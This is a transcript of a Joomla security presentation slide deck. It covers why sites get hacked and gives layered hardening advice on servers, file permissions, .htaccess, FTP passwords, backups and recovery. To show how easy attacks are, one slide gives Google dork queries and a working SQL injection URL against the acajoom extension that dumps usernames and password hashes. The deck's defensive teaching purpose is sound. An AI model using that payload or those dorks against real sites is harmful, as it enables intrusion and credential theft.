brendon hatcher joomla security
TRANSCRIPT
JoomlaSecurit
y
JoomlaSecurit
yBrendon Hatcher
Technical DirectorPhoto: flickr.com/photos/carbonnyc
Bare essentials to serious measures
Understanding hackers and hacking
Definitions of “hacker”
Hacker’s motivations
Evidence of hacking
What is a hacker? Someone who deliberately seeks to bypass a
server’s security– Black, grey, white hats– A hacked site is a broken/compromised site
A skilled computer programmer– A hacked site is a tweaked and improved site
A script kiddie– Junior hacker using other
hacker’s tools and techniques
Hacker’s motivations To see if they can To create mayhem For social standing in the sub-culture For political reasons – hacktivism For financial reasons
– Theft – steal ebooks, videos, games, online services etc
– Sell data – user profiles, credit card details etc– Industrial sabotage - paid to break competitor sites– Set up zombie farms– Steal bandwidth– Host phishing pages– Collect passwords
Evidence of hacking None! Site trashed Hacking message High bandwidth use Changed admin password New user with admin rights Server logs
Why be
concernedabout
security?
No-one is safe
Hacking is actually quite easy
Fixing hacked sites is tricky
Hacked sites are a big problem
No-one is safeType of site Motivation
Any site To see if they canTo create mayhemSocial standingPost political messagesZombie farmsSteal bandwidthHost phishing pages
Any membership site
Sell user profiles to marketersObtain usernames and passwords
Some ecommerce sites
Sell credit card details to thievesSell order history and contact details to marketers
Why worry about hacking? Sites are targeted at random Hacking is actually quite easy
– Vulnerable sites are easy to find– Vulnerable sites are easy to hack
Fixing hacked sites is quite tricky– Hacks can be invisible– Clients may not notice a hacked site for some time– Finding a clean backup may be impossible– Determining what has been done can be really hard– May be difficult to restore– Hardening site to avoid future hacks requires skill
and focus
Why worry about hacking? Hacked sites are a big problem
– Business reputation– Angry clients– Site shutdown by host– Loss of business– Data theft
Photo: flickr.com/photos/gaetanlee/
Hacking a
Joomla site
Is Joomla less secure than other systems?
The site must be vulnerable
3 steps to hacking for fun and profit
Is Joomla less secure than other systems?
Yes and No
Joomla has to strike a balance between security and ease of use
Joomla an attractive target for hackers– The critical mass of sites– Large amateur web developer user base – Extensions have variable security
The site must be vulnerable
3 steps to hacking for fun and profit
1. Find a vulnerability (and instructions on how to exploit it)
2. Find a vulnerable site
3. Hack the site
Then, sit back and enjoy fame and fortune!
Find a vulnerability
Security sites– www.exploit-db.com, www.secunia.com
Various hacking sites/forums Joomla vulnerable extensions list
– docs.joomla.org/Vulnerable_Extensions_List
Find a vulnerable site
Google Dork - a search phrase to find vulnerable sites
PHPInfo– intitle:phpinfo()
Vulnerable extensions– allinurl:com_acajoom
http://xxxxxxxxxxxxxxxxx/index.php?option=com_acajoom&act=mailing&task=view&listid=1&Itemid=1&mailingid=1/**/union/**/select/**/1,1,1,1,concat(username,0x3a,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/from/**/jos_users/**/LIMIT/**/1,1/*
Cut and paste hack code
Photo: flickr.com/photos/tawheedmanzoor
Security
action plan
Web sites are like onions
Levels of security
Web development tools
Strong, unique passwords everywhere
Continuous attention
Web sites arelike onions
Server operating system Apache PHP + MySQL
Joomla Extensions Users and their behaviour
Levels of security
[1] Basic actions
[2] More complex actions
[3] Actions that require significant modification rights on the server (unless already implemented by default)
Image by echiner1
Web development tools WHM – server administration cPanel – hosting account administration FileZilla – FTP app Keepass – password vault
General advice Strong, unique passwords everywhere
– A password vault removes the need to have a single, simple password
Continuous attention needed
Creating a
safehome for
Joomla
Shared, VPS or dedicated servers?
Apache
PHP
MySQL
Shared, VPS or dedicated servers?
A shared server– Your site(s) live in the same hosting space as other
sites that you do not administer– This is the cheapest hosting option. – No say over the security of the other sites on the
server– Old shared server is the worst location for your
hosting
A Virtual Private Server– Better than shared– Still can’t change many settings
Shared, VPS or dedicated servers?
A dedicated server– Still a “shared” server– Allow you to upgrade and tweak all the settings on a
dedicated server– Host retains responsibility for maintenance
Additional security Suhosin – hardens PHP Samhain or Tripwire Configserver firewall
Apache [3] suExec
– CGI scripts run under the user of the website instead of the Apache user
[3] Mod_security– Intrusion detection and prevention engine
PHP [2] PHP5, not PHP4 [3] suPHP
– PHP files are run under the user of the website instead of the Apache user
Globally reset all files– Owner – AccountUsername:AccountUsername
chown -R user:group *– Files – 644find . -type f -exec chmod 644 {} \;
– Folders – 755find . -type d -exec chmod 755 {} \;
Hosting account .htaccess files
– [1] Activate the htaccess file in the Joomla root– [1] Use an .htpasswd for the /administrator/ folder– [3] Advanced .htaccess files– A LOT more important detail in the manual
Securing aJoomla site
Keeping up to date
Avoiding the obvious
Hide, and be very, very quiet
Spam form submissions
Install sh404SEF
Keeping up to date Must update Joomla core and extensions Remove unused extensions
Avoiding the obvious [1] The default database extension is jos_ [1] The default admin username is admin [1] The default admin user ID is 62 [1] Change administrator access URL
Hide, and be very, very quiet
[1] SEF all URLs [1] Clear the default Joomla metatags [1] Clear the default Home page title [1] Remove generator tag [1] Change favicon [2] Hide component credits
Spam form submissions Trying to inject spam content onto your site Targets Joomla core forms and extension forms Install a captcha system
Install sh404SEF SEF URLS hide from Google Dorks Flood control Other security settings
Creating a
safe working environment
PC vulnerability to hacks
FTP access hacks
A note about users
“Burglar bars, electric fences,
alarms…and a key left under the
doormat”
PC vulnerability to hacks [1] Install all operating system patches [1] Install all application system patches [1] Run comprehensive real-time protection
apps [1] Install Secunia PSI [1] Secure your PC login [1] Secure your backup
storage [2] Use a secure web
browser
FTP access hacks If a hacker can obtain your FTP password, they
can login as you, bypassing almost every security barrier.
– FTP passwords are stored unencrypted in your FTP program!
– FTP authentication details pass unencrypted to the server!
– There are several common FTP apps that store their passwords in a standard location with a standard name!
FTP configuration [1] cPanel setup
– Make sure that the FTP password is strong
[1] PC setup– Password vault (LastPass , Keepass ) to store the
strong password– Make sure passwords are not stored anywhere else
(including on a Post-It note on the side of the PC)
[1] FileZilla– Copy all passwords to the password vault – Delete all passwords from the Site Manager– Set FileZilla to run in Kiosk mode
FTP configuration [2] Joomla
– Remove the FTP details from the configuration file
[3] WHM– Disable FTP access and allow only SFTP access
A note about users– You should ideally create separate user accounts for
each staff member
Preparing for
the worst
Site monitoring
A disaster recovery plan
Joomla site backups
Restoring a hacked site
Site monitoring Diagnostics
– Site down– Home page content changes– Mod_security logs (shows attempts)– Bandwidth use– Spam blacklisting
[3] Searching and browsing server logs
Disaster Recovery Plan Depending on how central your web site is to
your business, you may need a DRP See Tom Canavan’s presentation
– http://www.slideshare.net/coffeegroup/tom-canavan-joomla-security-and-disaster-recovery
Photo: flickr.com/photos/28481088@N00
Joomla site backups Long-cycle Joomla backups are critical Redundant backups lead to restful sleep
See my Joomla for Web Developer talk for MUCH more detail
Restoring a hacked site Fixes the obvious
problems Does not address:
– Hidden hacks• Shell scripts• Backdoors• Zombies
– Continuing vulnerabilities
– Impacts of data exposure
Photo: flickr.com/photos/andreweason
Credits/Disclaimer Brendon Hatcher is the compiler of this
presentation The presentation is released under the
Creative Commons Licence – Attribution, Non-commercial, No derivatives
If you don’t know what this licence means, go to creativecommons.org
The content is provided without warranty. It is a work in progress and represents my current understanding of Joomla security.